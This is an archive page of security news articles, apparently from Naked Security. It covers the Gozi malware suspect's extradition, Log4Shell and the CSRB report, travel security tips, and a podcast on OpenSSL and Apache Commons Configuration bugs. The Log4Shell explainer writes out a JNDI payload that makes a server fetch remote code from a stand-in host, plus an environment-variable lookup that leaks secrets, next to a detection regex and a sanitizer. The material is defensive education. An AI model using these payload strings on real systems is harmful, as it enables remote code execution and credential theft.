Category Archives: News

Last member of Gozi malware troika arrives in US for criminal trial

As the English translation of the Baroque-era German rendering of the Ancient Greek philosophical saying goes:

Though the mills of God grind slowly, yet they grind exceeding small/Though with patience he stands waiting, with exactness grinds he all.

Today, this saying is usually applied in respect of the judicial process, noting that although justice sometimes doesn’t get done quickly, it may nevertheless get done, and done meticulously, in the end.

That’s certainly the case for a troika of cybercriminals alleged to have been behind the infamous Gozi “banking Trojan” malware, which first appeared in the late 2000s.

The jargon term banking Trojan refers to malicious software that is specifically programmed to recognise, monitor and manipulate your interactions with online banking sites, with the ultimate aim of ripping off your account and stealing your funds.

Typical banking Trojan tricks include: logging your keystrokes to uncover passwords and other secret data as you type it in; scanning local files and databases hunting for private data such as account numbers, account history, passwords and PINs; and manipulating web data right inside your browser to skim off secret information even as you access genuine banking sites.

Way back in 2013, three men from Europe were formally charged with Gozi-related cybercrimes in a US federal court in New York:

  • NIKITA KUZMIN, then 25, from Moscow, Russia.
  • DENNIS ČALOVSKIS, then 27, from Riga, Latvia.
  • MIHAI IONUT PAUNESCU, then 28, from Bucharest, Romania.

The three mouseketeers

Kuzmin, as we explained at the time, was effectively the COO of the group, hiring coders to create malware for the gang, and managing a bunch of cybercrime affiliates to deploy the malware and fleece victims – an operating model known as crimeware-as-a-service that is now used almost universally by ransomware gangs.

Čalovskis was a senior programmer, responsible for creating the fake web content that could be injected into victims’ browsers as they surfed the internet, in order to trick them into revealing secret data to the crimeware gang instead of to their bank or financial institution.

And Paunescu was, in effect, the CIO; the IT chieftain who operated a series of what are known in the jargon as bulletproof hosts, a slew of servers and other IT infrastructure carefully hidden away from identification and takedown by law enforcement (or, for that matter, by rival cybercrooks).

Čalovskis was soon arrested in Latvia, but wasn’t immediately extradited to the US to stand trial because the Latvian authorities agreed with his legal team that he might face 67 years in prison, which they deemed unreasonably severe. (The US routinely lists maximum penalties in its press releases, even though such long sentences are rarely handed out.)

Ultimately, the two countries and the accused seem to have reached an agreement whereby Čalovskis would receive a prison sentence of at most two years, in return for pleading guilty and waiving the right to appeal.

He was sent to the US, locked up while his legal case ground its way through the courts, and ultimately sentenced to “time served” of 21 months and then kicked out of the US.

Time served means that the judge treats the time spent in custody awaiting trial as sufficient punishment for the crime itself, so that the guilty party is essentially deemed to have completed their official imprisonment at the conclusion of the trial.

Kuzmin, too, ended up convicted-but-immediately-set-free-for-deportation in 2016, after just over three years locked up in the US while on trial.

But Paunescu, it seems, was spared extradition by a Romanian court, and remained free until late last year, when he travelled to Colombia and was arrested at Bogotá International Airport by the Colombian authorities.

The Colombians, it seems, then contacted the US diplomatic corps, assuming that the US still considered Paunescu a “person of interest”, and asking whether the US wanted to apply to extradite him from Colombia to stand trial in America.

The US, as you can imagine, was indeed interested in doing just that.

Suspect number 3 touches down in the US

Finally, more than nine years after we wrote about that first indictment in New York, Paunescu has reached the US.

As US Attorney Damian Williams explained in the US Department of Justice’s press release about Paunescu’s inauspicious arrival in America:

Mihai Ionut Paunescu is alleged to have run a “bulletproof hosting” service that enabled cybercriminals throughout the world to spread the Gozi virus and other malware and to commit numerous other cybercrimes. His hosting service was specifically designed to allow cybercriminals to remain hidden and anonymous from law enforcement. Even though he was initially arrested in 2012, Paunescu will finally be held accountable inside a US courtroom. This case demonstrates that we will work with our law enforcement partners here and abroad to pursue cybercriminals who target Americans, no matter how long it takes.

As the DoJ notes, Paunescu’s criminal nickname (the handle he was known by in the cyberunderworld) was Virus.

As well as disseminating the Gozi malware, the DoJ alleges that “the Virus” also distributed other data-stealing malware, including the notorious Zeus and SpyEye strains.

Paunescu faces one charge of conspiracy to commit computer intrusion (up to 10 years in prison), one charge of conspiracy to commit bank fraud (up to 30 years), and one charge of conspiracy to commit wire fraud (up to 20 years).

Although his fellow conspirators are already out of US prison, Paunescu’s stay there is only just starting.



8 months on, US says Log4Shell will be around for “a decade or longer”

Remember Log4Shell?

It was a dangerous bug in a popular open-source Java programming toolkit called Log4j, short for “Logging for Java”, published by the Apache Software Foundation under a liberal, free source code licence.

If you’ve ever written software of any sort, from the simplest BAT file on a Windows laptop to the gnarliest mega-application running on a whole rack of servers, you’ll have used logging commands.

From basic output such as echo "Starting calculations (this may take a while)" printed to the screen, all the way to formal messages saved in a write-once database for auditing or compliance reasons, logging is a vital part of most programs, especially when something breaks and you need a clear record of exactly how far you got before the problem hit.

The Log4Shell vulnerability (actually, it turned out there were several related problems, but we’ll treat them all as if they were one big issue here, for simplicity) turned out to be half-bug, half-feature.

In other words, Log4j did what it said in the manual, unlike in a bug such as a buffer overflow, where the offending program incorrectly tries to mess around with data it promised it would leave alone…

…but unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of careful input verification on top of Log4j, your software could come unstuck.

Really, badly, totally unstuck.

Interpolation considered harmful

Simply put, Log4j didn’t always record log messages exactly as you supplied them.

Instead, it had a “feature” known variously and confusingly in the jargon as interpolation, command substitution or auto-rewriting, so that you could trigger text manipulation features inside the logging utility itself, without having to write special code of your own to do it.

For example, the text in the INPUT column below would get logged literally, exactly as you see it, which is probably what you’d expect of a logging toolkit, especially if you wanted to keep a precise record of the input data your users presented for regulatory reasons:

INPUT                        OUTCOME
-----------------------      ------------------------
USERNAME=duck             -> USERNAME=duck
Caller-ID:555-555-5555    -> Caller-ID:555-555-5555
Current version = 17.0.1  -> Current version = 17.0.1

But if you submitted text wrapped in the magic character sequence ${...}, the logger would sometimes do smart things with it, after receiving the text but before actually writing it into the logfile, like this:

INPUT                                 OUTCOME
----------------------------------    -------------------------------------------
CURRENT=${java:version}/${java:os} -> CURRENT=Java version 17.0.1/Windows 10 10.0
Server account is: ${env:USER}     -> Server account is: root
${env:AWS_ACCESS_KEY_ID}           -> SECRETDATAINTENDEDTOBEINMEMORYONLY
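To make the mechanism concrete, here is a minimal Python sketch of a logger that performs this kind of ${...} lookup substitution. It is purely illustrative (the lookup table and its behaviour are our own simplification, not Log4j’s actual code), but it shows how untrusted text can pull live data out of the server process’s own environment:

```python
import os
import re

# A toy lookup table, loosely mimicking Log4j's env: and java: prefixes.
# (Our own simplification: real Log4j supports many more lookup types.)
LOOKUPS = {
    "env": lambda key: os.environ.get(key, ""),
    "java": lambda key: {"version": "17.0.1", "os": "Windows 10 10.0"}.get(key, ""),
}

def interpolate(message: str) -> str:
    """Rewrite ${prefix:key} sequences before the message is logged."""
    def expand(match):
        prefix, key = match.group(1), match.group(2)
        handler = LOOKUPS.get(prefix)
        return handler(key) if handler is not None else match.group(0)
    return re.sub(r"\$\{(\w+):([^}]*)\}", expand, message)

# Plain text is logged exactly as supplied...
print(interpolate("USERNAME=duck"))             # USERNAME=duck

# ...but ${...} text is rewritten, so untrusted input can pull live
# data out of the server process's own environment:
os.environ["AWS_ACCESS_KEY_ID"] = "SECRETDATA"
print(interpolate("${env:AWS_ACCESS_KEY_ID}"))  # SECRETDATA
```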

Clearly, if you’re accepting logging text from a trusted source, where it’s reasonable to allow the loggee to control the logger by telling it to replace plain text with internal data, this sort of text rewriting is useful.

But if your goal is to keep track of data submitted by a remote user, perhaps for regulatory record-keeping purposes, this sort of auto-rewriting is doubly dangerous:

  • In the event of a dispute, you don’t have a reliable record of what the user actually did submit, given that it might have been modified between input and output.
  • A malicious user could send sneakily-constructed inputs in order to provoke your server into doing something it wasn’t supposed to.

If you’re logging user inputs such as their browser identification string, say (known in the jargon as the User-Agent), or their username or phone number, you don’t want to give the user a chance to trick you into writing private data (such as a memory-only password string like the AWS_ACCESS_KEY_ID in the example above) into a permanent logfile.

Especially if you’ve confidently told your auditors or the regulator that you never write plaintext passwords into permanent storage. (You shouldn’t do this, even if you haven’t officially told the regulator you don’t!)
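One obvious stopgap, sketched below in Python, is to defang the magic sequence in any untrusted input before it reaches the logger. (This is our own illustration, not an official Log4j API; the proper fix was to upgrade Log4j or remove the vulnerable lookup code, as described later in this article.)

```python
def sanitize_for_log(untrusted: str) -> str:
    # Defang the ${ trigger sequence so a vulnerable logger records it
    # literally instead of interpolating it. The replacement keeps the
    # original input recognisable for audit purposes.
    return untrusted.replace("${", "$\\{")

# User-supplied fields get sanitized before they reach the logger:
print(sanitize_for_log("User-Agent: ${jndi:ldap://dodgy.example/x}"))
```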

Worse to come

In the Log4Shell is-it-a-bug-or-is-it-a-feature case, however, things were much worse than the already-risky examples we’ve shown above.

For example, a user who deliberately submitted data like the input shown below could trigger a truly dangerous sequence of events:

INPUT                                                OUTCOME
-------------------------------------------------    ----------------------------------------
${jndi:ldap://dodgy.server.example:8888/BadThing} -> Download and run a remote Java program!?

In the “interpolation” string above, the ${...} character sequence that includes the abbreviations jndi and ldap told Log4j to do this:

  • Use the Java Naming and Directory Interface (JNDI) to locate dodgy.server.example online.
  • Connect to that server via LDAP, using TCP port 8888.
  • Request the data stored in the LDAP object BadThing.
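Defenders hunting for Log4Shell-style probes in their logs can look for exactly that pattern. Here’s a rough Python sketch; the regex is our own approximation of the basic payload shape, and real attacks used many obfuscated variants that a simple pattern like this won’t catch:

```python
import re

# Matches the basic ${jndi:<scheme>://<host>[:<port>]/<path>} shape.
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns)://([^:/}]+)(?::(\d+))?/([^}]*)\}",
    re.IGNORECASE,
)

def find_jndi_probe(text: str):
    """Return (scheme, host, port, path) if the text contains a JNDI lookup."""
    m = JNDI_PATTERN.search(text)
    if not m:
        return None
    scheme, host, port, path = m.groups()
    return scheme.lower(), host, int(port) if port else None, path

# The example payload from the table above:
print(find_jndi_probe("${jndi:ldap://dodgy.server.example:8888/BadThing}"))
```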

In other words, attackers could submit specially-crafted input that would instruct your server to “call home” to a server under their control, without so much as a by-your-leave.

How could this be a “feature”?

You might be wondering how a “feature” like this ever made it into the Log4j code.

But this sort of text rewriting can be useful, as long as you’re logging data from a trusted source.

For example, you could log a numerical user ID, but also ask the logger to use LDAP (the lightweight directory access protocol, widely used in the industry, including by Microsoft’s Active Directory system) to retrieve and save the username associated with that account number at that time.

This would improve both the readability and the historical value of the entry in the logfile.

But the LDAP server that Log4j called out in the example above (which was chosen by the remote user, don’t forget) is unlikely to know the truth, let alone to tell it, and a malicious user could therefore use this trick to fill up your logs with bogus and even legally dubious data.

Even worse, the LDAP server could return precompiled Java code for generating the data to be logged, and your server would dutifully run that program: an unknown program, supplied by an untrusted server, chosen by an untrusted user.

Loosely speaking, if any server, anywhere in your network, logged untrusted input that had come in from outside, and used Log4j to do so…

…then that input could be used as a direct and immediate way to trick your server into running someone else’s code, just like that.

That’s called RCE in the jargon, short for remote code execution, and RCE bugs are generally the most keenly sought by cybercriminals because they can typically be exploited to implant malware automatically.

Unfortunately, the nature of this bug meant that the danger wasn’t limited to internet-facing servers, so running web servers written in C, not Java (e.g. IIS, Apache httpd, nginx), which therefore didn’t themselves use the buggy Log4j code, didn’t free you from risk.

In theory, any back-end Java app that received and logged data from elsewhere on your network, and that used the Log4j library…

…could potentially be reached and exploited by outside attackers.

The fix was pretty straightforward:

  • Find old versions of Log4j anywhere and everywhere in your network. Java modules typically have names like log4j-api-2.14.0.jar and log4j-core-2.14.0.jar, where jar is short for Java archive, a specially-structured sort of ZIP file. With a searchable prefix, a definitive extension, and the version number embedded in the filename, quickly finding offending files with “the wrong” versions of Java library code is actually fairly easy.
  • Replace the buggy versions with newer, patched ones.
  • If you weren’t in a position to change Log4j versions, you could reduce or remove the risk by removing a single code module from the buggy Log4j package (the Java code that handled JNDI lookups, as described above), and repackaging your own slimmed-down JAR file with the bug suppressed.
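The first step above can be automated in a few lines. Here’s a Python sketch that walks a directory tree looking for filenames of that form. (The filename pattern is an assumption based on the typical names mentioned above; relocated or renamed JARs, and Log4j code bundled inside other archives, won’t be found this way.)

```python
import os
import re

# Matches names like log4j-api-2.14.0.jar / log4j-core-2.14.0.jar
# and captures the embedded version number.
LOG4J_JAR = re.compile(r"^log4j-[\w.-]*?(\d+\.\d+\.\d+)\.jar$")

def find_log4j_jars(root: str):
    """Walk a directory tree and report every Log4j JAR and its version."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            m = LOG4J_JAR.match(name)
            if m:
                hits.append((os.path.join(dirpath, name), m.group(1)))
    return hits
```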

The saga continues

Unfortunately, a recent, detailed report on the Log4Shell saga, published last week by the US Cyber Safety Review Board (CSRB), part of the Department of Homeland Security, contains the worrying suggestion (our emphasis below) that:

[T]he Log4j event is not over. The [CSRB] assesses that Log4j is an “endemic vulnerability” and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.

What to do?

At 42 pages (the executive summary alone runs to nearly three pages), the Board’s report is a long document, and parts of it are heavy going.

But we recommend that you read it through, because it’s a fascinating tale of how even cybersecurity problems that ought to be quick and easy to fix can get ignored, or put off until later, or as-good-as denied altogether as “someone else’s problem” to fix.

Notable suggestions from the US public service, which we wholeheartedly endorse, include:

  • Develop the capacity to maintain an accurate information technology (IT) asset and application inventory.
  • [Set up a] documented vulnerability response program.
  • [Set up a] documented vulnerability disclosure and handling process.

When it comes to cybersecurity, ask not what everyone else can do for you…

…but think about what you can do for yourself, because any improvements you make will almost certainly benefit everyone else as well.




7 cybersecurity tips for your summer vacation!

It’s prime vacation season in the Northern Hemisphere, and in some countries, July and August aren’t just months when some people take some days off, but a period of extended family holidays, often involving weeks away from home or on the road.

The good news, of course, is that if you’ve had to work from home over the past two years, you’re probably better informed about outside-the-office cybersecurity than ever.

The bad news, however, is that although working from home generally offers less “IT shelter” than working from work, and has therefore taught a lot of us plenty about cybersecurity that we didn’t know before…

…your home network almost certainly provides much more IT shelter than you’ll get while you’re on the road, especially if you’re bursting to set off on a vacation you’ve been waiting nearly three years to enjoy!

So, we decided to answer the most common travel questions that people either [a] worry about instead of informing themselves before they set off, or [b] don’t think about at all until it’s too late.

Here you are – have fun, but travel safely!

Q1. Should I make a backup before I set off?

A1. Yes. We suspect that you’re more likely to lose or damage a phone or laptop (or, worse, have it stolen) while travelling than while working from home or in the office.

Remember the simple but effective Sophos Naked Security saying: “The only backup you will ever regret is the one you didn’t make.”

Backing everything up reliably before you set off also means you are free to strip down the amount of digital content you keep loaded on your devices, and thus to reduce the quantity of data you might have to declare or reveal at a border crossing. (See Q3.)



Q2. Should I encrypt my laptop and my mobile phone?

A2. Yes. Most modern mobile phones come pre-encrypted, but the encryption depends on having a decent lock code, which is used to access the underlying encryption and decryption keys.

Don’t settle for an easy lock code for travelling, just in case you get into a crisis and think you might forget it.

Pick a nice, long lock code (we recommend 10 digits or more, and we don’t mean 00000 00000 or 12345 12345), and practise using it regularly for a few days before you leave, until you can remember it easily.



Q3. Should I be worried about crossing national borders?

A3. Worrying will get you nowhere. Don’t be worried, be prepared.

Many countries with border checks reserve the right to ask you to unlock your electronic devices as a condition of entry, and to let them have a look. Some countries may even ask to make what’s called a forensic copy, meaning they copy every sector off the device, even disk sectors containing data you previously deleted. (This can take quite a while, so it could turn a 10-minute border crossing into a multi-hour delay.)

Some countries ask you to state not merely your home address and your phone number, but also to hand over your email and social media addresses, too.

You’re almost certainly entitled to refuse to provide that sort of detail, but in return you should assume that the country you’re trying to enter will refuse to admit you – it’s very much a case of “My Kitchen, My Rules.”

So, prepare yourself before you go by checking up on the entry requirements of anywhere you’re planning to visit. If you don’t like the conditions, then either don’t go there, or don’t take all your electronic devices or all your data with you.



Q4. Should I use public Wi-Fi when I’m on the road?

A4. If you want. The dangers of public Wi-Fi are often exaggerated, and can largely be avoided if you stick to apps with proper encryption, and if you only use websites with URLs that start https://, short for “secure HTTP”. This scrambles the data before it leaves your laptop or phone, and (in theory) only unscrambles it after it reaches the other end. Computers in between can’t easily snoop on or sneakily alter the data going back and forth.

However, if you access services in the country you are visiting that demand that you install a special digital certificate (for example, “for security or regulatory reasons”), this means your browsing almost certainly can be spied upon while you’re there, and even after you get back home.

If you don’t like using public Wi-Fi, consider buying a local SIM card with a pre-paid data plan for the duration of your visit. But remember that most countries require their telephone providers to have so-called lawful interception facilities, so a mobile data plan isn’t anonymous just because you bought a “burner” SIM card at a convenience store.



Q5. Should I use kiosk PCs in airports or hotels?

A5. No. We strongly suggest that you don’t, unless you can’t avoid it. (If it’s unavoidable, limit your logins and how much data you expose as much as you can. For example, if you need to use a hotel kiosk PC to print off a boarding card before leaving for the airport, don’t check your Facebook account at the same time!)

The problem with kiosks is not just that you have to trust the company that runs them, e.g. the hotel or the airport operator, and every techie who services them, but also everyone else who’s used those kiosk computers before you and could have meddled with them.

Unlike a hacked Wi-Fi access point, which can only sniff out data (hopefully encrypted) between you and its destination, a hacked kiosk PC may have unfettered access to all the data you send and receive during the period that it’s unencrypted, could be tracking every keystroke you type, could take screenshots of everything you do, and could retain an exact copy of everything you print.



Q6. What about spycams in hotel rooms and Airbnbs?

A6. We can answer that partially, but not with the simplicity and the precision you would probably like.

Unfortunately, spycams hidden in guest quarters are a real thing, and in the pre-pandemic year of 2019, we wrote about three different incidents where guests found “peeping Tom” cameras in their rooms: at a farm work hostel in Australia; at an Airbnb house in Ireland; and in a South Korean hotel. (In the first and last of those cases, we’re pleased to say, the perpetrators were arrested and charged.)

Sometimes, hidden cameras are fairly easy to spot if you search your room or rooms carefully. But spycams can be tiny enough to hide almost anywhere, and they won’t always show up on the property’s public Wi-Fi network.

Sadly, this means that not finding a spy camera doesn’t mean there isn’t one.

All we can advise is this:

  • Search for obvious hiding places. Clocks that are curiously positioned, duplicate smoke alarms, electronic “gizmos” where they aren’t needed, signs of digital devices squeezed into vents, and so forth.
  • If you find one, photograph it, and also photograph the property to show that you haven’t caused any damage that could be used as an excuse or a counterclaim by the perpetrator.
  • Keep your clothes on, and leave the property if you can.
  • Report the incident to the local police and to the head office of the hotel or rental agent.

To reduce the risk of being recorded while typing in passwords or lock codes, shield your keyboard or phone when entering critical data whenever you are in locations you don’t trust fully, just as you do (or should do) when using a bank ATM (cash machine) or a payment terminal in a shop.



Q7. What if I want to take my work laptop along?

A7. We can’t answer that. Only your work can, so the simple answer is, “Ask.”

If they say “No”, that’s that. Leave it behind, perhaps even locked up at work.

If they say “Yes”, they are likely to ask you where you’re going and then hand out advice (or specific requirements) for your chosen destination.

Take their advice. After all, if the company thinks its data might be at extra risk in the country you’re visiting, then your personal data will almost certainly be at extra risk too. So, treat work’s advice as a benefit, not a hindrance!


The bottom line

In short, have fun, but don’t take more devices or data than you need, read up on any privacy and surveillance rules at your destination before you set off, and be aware of your surroundings when entering personal data.

Remember:  If in doubt/Don’t give it out.

And:  If your life’s on your phone/Why not leave it at home?

Buying a cheap phone that’s good enough for your vacation may end up costing less than the first round of beachfront cocktails you’re looking forward to when you get there…


Main image of Copacabana beach thanks to Bisonlux on Flickr, under a CC BY 2.0 licence.


S3 Ep91: CodeRed, OpenSSL, Java bugs and Office macros [Podcast + Transcript]

LISTEN NOW


With Doug Aamoth and Paul Ducklin.

Intro and outro music by Edith Mudge.

You can listen to us on Soundcloud, Apple Podcasts, Google Podcasts, Spotify, Stitcher and anywhere that good podcasts are found. Or just drop the URL of our RSS feed into your favourite podcatcher.


READ THE TRANSCRIPT

DOUG.  A brief history of Office macros, a Log4Shell style bug, two OpenSSL crypto bugs, and more…

…on the Naked Security podcast.

[MUSICAL MODEM]

All right, welcome to the podcast, everybody.

I am Doug Aamoth, and he is Paul Ducklin.

Paul, how do you do?


DUCK.  I’m well, Doug!

Welcome back – hope you enjoyed last week off.


DOUG.  Thank you, I did.

It was warm, but not as warm as it is where you are now.


DUCK.  We’re having what in the UK counts as a heatwave, and there’s not a breath of wind today, so it is pretty sweltering.


DOUG.  Perhaps you will make history with the hottest recorded temperature?

But I will give you this bit of tech history while you wait…

This week, in 2001, the CodeRed worm started making its way through the internet.

It attacked computers running Microsoft IIS Web server, and spread by leveraging a buffer overflow.

And my, how times have…

…haven’t changed much, a couple of decades later.


DUCK.  Yes!

And when CodeRed happened, everyone said, “Oh, golly. One of the ways it spreads is just like what the Internet worm, the Morris Worm, did, way back in 1988. Have we learned nothing?”

And it turns out that was a rhetorical question, Doug.

[LAUGHTER]


DOUG.  Do you remember dealing with this worm?


DUCK.  It’s not one of the ones that one would ever forget, because of the speed and suddenness of it all…

…and the fact that it’s this network packet that just showed up, and then went revving off elsewhere.

I think the huge deal, particularly given the timing of it, at the beginning of the 21st century, was that although it fortunately didn’t have any badness directly programmed into it such as “Hey, download ransomware and scramble the computer”, it nevertheless generated so much network traffic…

Outbound traffic for you, attacking the next guy, and inbound for everyone else.

And with lots and lots of countries having very strict internet usage caps in those days, it raised the issue of, “Who’s going to pay? I didn’t ask for this traffic. I didn’t ask to have somebody who hadn’t secured their IIS server pound me. I couldn’t actually stop this. It reached my router because it got through the ISP!”

So there was this whole thing of, “Who takes responsibility? Who pays for it?”

I was in Sophos Australia at the time, and my ISP actually came out and said they were basically going to unmeter everything, loosely speaking, for a bit, while they got to the bottom of it.

So, fortunately, it ended without too many tears, but it is a great indicator that sometimes the side effects of malware, even if it was intended as a “prank” right at the start, can be much worse than dangerous things that are programmed into the malware itself.


DOUG.  I love listening to these stories of you living through these awful times, even though they were awful, because it’s such a good context for stuff that’s going on now… because it hasn’t changed all that much.


DUCK.  Fortunately, Doug, we did have good mobile phone coverage in those days.

So at least you knew that you could phone home and say, “I might be a bit late.”

[LAUGHTER]

I’m glad to have lived through it, but I would not have said that at the time!


DOUG.  Well, speaking of coming home late, there are two OpenSSL “one-liner” crypto bugs that some headlines are referring to as ‘Worse Than Heartbleed’.


DUCK.  These are fascinating bugs.

They were basically what I call one-liners… in other words, with one line of code changed or added, the bug could be fixed.

And one of them was specific to the special numeric calculations for public key cryptography.

That one was CVE-2022-2274: Memory overflow in RSA modular exponentiation.

I won’t go into what modular exponentiation is, but it’s basically multiplying a number by itself over and over and over again and doing divisions as you go along.

And it turns out that you can greatly accelerate that iterative calculation if you have a CPU or chip in your computer that supports what’s called vector arithmetic, which is where you do the same calculation at the same time on multiple lots of data, so you effectively get four instructions for the price of one.

And some Intel chips have a super-special, extra-powerful version of that called AVX512.

And so OpenSSL goes, “Well, if you’ve got that chip, I’ll use this super-fast extra way of accelerating everything.”

And in the middle of it, the programmer was given a number of bits that were supposed to be copied from A to B in memory…

…but in fact, because the code is dealing with a special chip that works with big integers, the programmer didn’t copy N bits.

They copied N unsigned long integers, meaning that this was a memory buffer overflow of potentially spectacular proportions – you could be copying 64 times as much data as there was space for!

And so, one line fixed it: take the number of bits, and divide it down to convert it into the number of *integers* you need to copy instead of the number of bits.

Literally a one line fix.

Phew!
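Loosely speaking, the arithmetic of that one-line fix is just a bits-to-words conversion. Here’s a toy Python illustration of the before-and-after (our own sketch of the idea, not OpenSSL’s actual source, which is written in C and assembler):

```python
BITS_PER_WORD = 64  # size of an 'unsigned long' on the affected platforms

def words_to_copy_buggy(nbits: int) -> int:
    # The bug, in spirit: a bit count was used where a word count was
    # needed, so up to 64x too much memory could be copied.
    return nbits

def words_to_copy_fixed(nbits: int) -> int:
    # The one-line fix, in spirit: divide the bit count down (rounding
    # up) to get the number of whole words holding those bits.
    return (nbits + BITS_PER_WORD - 1) // BITS_PER_WORD

# A 2048-bit RSA operand fits in 32 words, not 2048:
print(words_to_copy_buggy(2048))   # 2048
print(words_to_copy_fixed(2048))   # 32
```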


DOUG.  OK, what about the other one?


DUCK.  The other one is the delightfully named CVE-2022-2097: Data leakage in AES-OCB encryption.

This is a special type of what’s called “authenticated encryption”.

Again, I won’t go into that, but it’s a way of doing AES encryption where you take a number of 16-byte chunks, and you scramble those chunks one-by-one.

And in this particular variant of AES encryption, the programmer was supposed to go through the blocks from 1 to N, encrypting them, starting at block 1, 2, 3… up to and including N, thereby scrambling every block in the input.

Unfortunately, the code went from 1 to a value *less than* N, not *less than or equal to* N.

So the last block that was supposed to be encrypted never got encrypted!

And so, depending on how you were using the algorithm, it could actually mean that the encrypted data that you got back, and maybe saved to disk, was all perfectly encrypted, *except that the last 16 bytes would still be the original plaintext*.

So, plaintext would leak out every time you used the algorithm, which is not the idea of an encryption algorithm!

Everything or nothing, not arbitrary parts of it.

That too was fixed by a single-line change.

A test for “less than” was changed to a test for “less than or equal to” – a one-byte change in the final compiled code.

Wow!
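The loop-boundary blunder described above is easy to reproduce in miniature. In this toy Python sketch (our own illustration, with a stand-in “cipher” that is nothing like real AES-OCB), the “less than” version quietly returns the final block as plaintext:

```python
def toy_scramble(block: bytes) -> bytes:
    # Stand-in for a real cipher: XOR every byte with 0xAA.
    # (Illustration only; nothing like real AES-OCB!)
    return bytes(b ^ 0xAA for b in block)

def encrypt_buggy(blocks):
    # The 'less than' bug: the loop stops one block short, so the
    # final 16-byte block is returned unencrypted.
    return [toy_scramble(blocks[i]) if i < len(blocks) - 1 else blocks[i]
            for i in range(len(blocks))]

def encrypt_fixed(blocks):
    # 'Less than or equal to': every block gets scrambled.
    return [toy_scramble(b) for b in blocks]

data = [b"0123456789ABCDEF", b"SECRET LAST TEXT"]
print(encrypt_buggy(data)[-1])   # b'SECRET LAST TEXT' -- leaked plaintext!
print(encrypt_fixed(data)[-1])   # scrambled bytes
```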


DOUG.  OK, so you say the modular exponentiation bug is more severe, but you should just update them both, right?


DUCK.  Yes, the fixes are there, and they work, and they should be uncontroversial.

That’s the nice thing about a one-liner fix – it’s not like you’re changing an algorithm or changing the API.

So I think it’s a very uncontroversial update to apply.

And there are two updates, for the two supported versions of OpenSSL.

Version 3.0.4 gets updated to 3.0.5 – that has both the fixes in, because both the bugs are in that code.

And OpenSSL 1.1.1 goes from version P-for-Papa to Q-for-Quebec.

That doesn’t have the modular exponentiation bug; it only has the other one.

But one bug is bad enough!

So here’s my advice: Patch early, patch often, as always.


DOUG.  OK, you can read about that on nakedsecurity.sophos.com.

Now we move from something called ‘Worse than Heartbleed’… [WHISPERS] but it doesn’t sound like it was actually worse than Heartbleed.


DUCK.  No, I think that makes good headline, though!


DOUG.  Yes, of course!

But now, we have a Log4Shell-style bug in Apache…


DUCK.  Yes, that makes a good headline as well: “It could be like Log4Shell!”

And I have to be honest, I did use the word Log4Shell in the Naked Security headline, but I just described it as a ‘Log4Shell-style bug’, because it is.

And to me, that’s the most important part here, for any programmers now coming onto the scene.

Try not to make this mistake, which is the same sort of blunder that was made in the Log4Shell bug, and the same sort of blunder that we spoke about recently in Microsoft Follina.

And yes, Doug, it involves dollar signs and brackets.

If you remember Log4Shell…

If I said, “Log this word: DOUG,” then it would log DOUG, exactly as I sent it.

But if I said log this word: ${special_weird_command}, then I was actually telling the other end, “No, don’t log what I sent you. Do some funky calculations *based on what I sent you*, even though you can’t trust it, and then take the result of that, and log that instead.”

Sounds dangerous, because it is dangerous!

In Follina, it was $(command), where instead of that text being used literally and exactly to identify a file name, Windows would go, “Oh, hang on. What you should do is: don’t use that as the file name, but run what’s in the brackets *as a PowerShell command* and use that as the file name.”

And this was very much the same.

Because it’s Java, it’s like Log4Shell: ${dangerous_stuff}.

That’s how it worked.

Now, the code that the bug was in is called Apache Commons Configuration.

It’s a free utility library, part of the Apache Commons set of sub-projects, which is a load of super-useful packages and stuff.

And this one lets you handle configuration files – it’ll handle XML files, and it’ll handle INI files, and a whole load of other stuff.

And that dangerous stuff could be: “Run a command and take the output of the command,” which obviously means potential remote code injection.

It could be: “Do a DNS lookup with this computer name, and see what comes back.”

That’s a very simple, low-key way of exfiltrating data in the middle of a servername lookup request.

And the last one: you could say, “Go to this URL and, whatever comes back, use that.”

You’ve supplied data, but you actually get to instruct the other end, “Hey, run a command, do a DNS lookup, or visit my website.”

So even though you can’t send it code back to run, in the case of the website lookup, it means you’ve forced an outbound request, so you could have leaked all sorts of stuff to the crooks…

…and clearly, at least by default, that’s a terribly bad idea!
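To make the risk concrete, here’s a toy interpolator in Python in the spirit of those ${...} lookups. The prefixes here (upper, env) are invented for illustration; the real Commons Configuration lookups included things along the lines of the DNS, URL and script expansions described above:

```python
import os
import re

# Anything wrapped in ${prefix:value} is treated as a *lookup to execute*,
# not as literal text - exactly the behaviour that makes untrusted input dangerous.
LOOKUPS = {
    "upper": lambda v: v.upper(),              # harmless demo lookup
    "env": lambda v: os.environ.get(v, ""),    # leaks environment variables!
}

PATTERN = re.compile(r"\$\{([a-z]+):([^}]*)\}")

def interpolate(untrusted: str) -> str:
    def expand(match):
        prefix, value = match.group(1), match.group(2)
        handler = LOOKUPS.get(prefix)
        return handler(value) if handler else match.group(0)
    return PATTERN.sub(expand, untrusted)

# Plain text is handled as-is...
assert interpolate("Log this word: DOUG") == "Log this word: DOUG"
# ...but a ${...} sequence makes the *receiver* compute something new instead:
assert interpolate("Log this word: ${upper:doug}") == "Log this word: DOUG"
```

Swap that env lookup for a DNS or URL lookup and you have exactly the outbound-request exfiltration channel described above.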

In the last few versions of this Apache Commons Configuration (by a few versions, I mean over the last few years), this was added as a “feature”, but of course it turns out to be more of a liability.

So, in the latest version, that behaviour has been understandably reversed.


DOUG.  OK, that’s been sitting there since 2018 but has been patched in version 2.8.0, which you should update to if you can.

And we’ve got some instructions on the site on Naked Security, in the article, about how to check if you’re vulnerable.

So people can go there to check that out.


DUCK.  And of course the advice to programmers is: if you are writing code that can accept potentially untrusted data and has any kind of ${...} or $(...) feature meaning, “Hey, run this command that someone else decided upon”…

…check your inputs and outputs!

Not that we’ve ever said that before, Doug.

[LAUGHTER]

Don’t go for convenience over security if you can possibly help it.
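One crude way to act on that input-checking advice, if you must pass untrusted text into a component that might interpolate it, is to break the trigger sequences before they arrive. This is a sketch only; a strict allow-list of permitted characters is a stronger defence:

```python
def defang(untrusted: str) -> str:
    # Break the "${" and "$(" trigger pairs so downstream code can never
    # parse them as lookup/command directives. Crude, but illustrative.
    return untrusted.replace("${", "$\\{").replace("$(", "$\\(")

assert "${" not in defang("hello ${env:HOME}")
assert "$(" not in defang("file-$(whoami).txt")
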